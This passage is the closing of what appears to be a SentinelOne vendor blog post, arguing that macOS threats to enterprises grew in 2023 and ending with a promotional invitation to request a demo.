That’s a situation that’s been slowly but steadily changing for some years now, and a look back at 2023 should be enough to convince anyone that Mac threats are becoming both more numerous and more serious for enterprises. Just like other endpoints, Mac devices need to be protected with first-class security software to prevent threats and provide visibility.

If you would like to learn more about how SentinelOne can help defend the macOS devices in your fleet, contact us or request a free demo.